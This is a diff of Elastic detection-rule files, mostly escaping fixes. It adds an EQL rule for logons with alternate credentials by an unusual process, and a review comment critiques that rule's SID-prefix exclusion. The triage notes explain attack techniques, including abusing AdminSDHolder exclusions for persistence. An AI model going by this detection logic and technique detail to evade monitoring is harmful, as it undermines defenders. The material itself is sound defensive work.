@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json index 55ebf56746d..dcc039f7a85 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json index 315f367141f..63b7c40cedb 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json index 749bb9e6c43..8771e34637f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json index 9bf1b41d9dc..6e5269b52ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json index 91a3e9f487f..107f6f387a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json index 6da188c311e..7ab58868827 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json 
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json index 98b8e2ba8f2..1873eb5f885 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json index 94d39af72c5..6f1f31eda7d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json index 4c6ee3b41b5..176b3acbd17 100644 --- a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json +++ b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json 
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json index 8af9cfeef7c..e59bbd48e4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json +++ b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json index a638ce812fc..95e5275fdee 100644 --- a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json +++ b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json index 0857b4ada56..e1bfb0af51e 100644 --- a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json +++ b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json 
@@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json index d22f386e8ae..b0249030792 100644 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json index 2a2bb8082a8..a9fe89ba23d 100644 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json index 1a4ce1798a1..81f4a49b05e 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json 
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json index 284a9f44cb5..22eee240245 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json index a888b528d2a..d2cbe49b6d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json new file mode 100644 index 00000000000..ce9afd56280 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json 
@@ -0,0 +1,107 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-system.*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Interactive Logon by an Unusual Process",
+ "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\Okta\\\\Okta Verify\\\\OktaVerify.exe\", \n \"?:\\\\Program Files (x86)\\\\Okta\\\\Okta Verify\\\\OktaVerify.exe\")\n",
+ "references": [
+ "https://attack.mitre.org/techniques/T1134/002/"
+ ],
+ "related_integrations": [
+ {
+ "package": "system",
+ "version": "^1.6.4"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.LogonProcessName",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.SubjectUserSid",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.TargetUserSid",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.logon.type",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad",
+ "setup": "\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1134",
+ "name": "Access Token Manipulation",
+ "reference": "https://attack.mitre.org/techniques/T1134/",
+ "subtechnique": [
+ {
+ "id": "T1134.002",
+ "name": "Create Process with Token",
+ "reference": "https://attack.mitre.org/techniques/T1134/002/"
+ },
+ {
+ "id": "T1134.003",
+ "name": "Make and Impersonate Token",
+ "reference": "https://attack.mitre.org/techniques/T1134/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 1
+ },
+ "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json
index 5a5288dba2b..d4f5b14f448 100644
--- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json
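Review bot: The same-account exclusion in the new rule's query, `not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid)`, is a prefix test rather than an equality test, so an event whose target SID is a textual prefix of the subject SID (RID 1000 versus RID 10001 in the same domain, for instance) is suppressed even though subject and target are different accounts — a false negative on exactly the alternate-credential logon the rule is meant to catch. If same-account logons are what should be excluded, `winlog.event_data.SubjectUserSid != winlog.event_data.TargetUserSid` states that precisely; if the prefix match is deliberate, the reason should be written into the description so a later maintainer does not "fix" it. The `setup` text says only that event 4624 is needed; naming the audit subcategory that produces it (Audit Logon, success events) would make that actionable for operators who have to turn it on. Unlike the neighbouring rules in this package, the new rule ships no `note` investigation guide, so analysts triaging a high-severity hit get no guidance on distinguishing runas/credential-prompt usage by admins from token manipulation; a short triage section covering the Subject/Target account pair and the originating `process.executable` would close that gap.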
@@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json index d822ac6afd5..9c8e3a85aaa 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json index 96295fb71ac..6ea40021517 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json index 2e94f0ae923..5513d20181f 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json 
@@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json index 1d5974851a8..b303cd65cab 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json 
@@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -136,7 +136,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json index 8028627177a..87dea22718c 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json 
+++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -136,7 +136,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json index 5cd09ad32c9..fac7276d2da 100644 
--- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json 
@@ -14,7 +14,7 @@
 "license": "Elastic License v2",
 "name": "AdminSDHolder SDProp Exclusion Added",
 "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). 
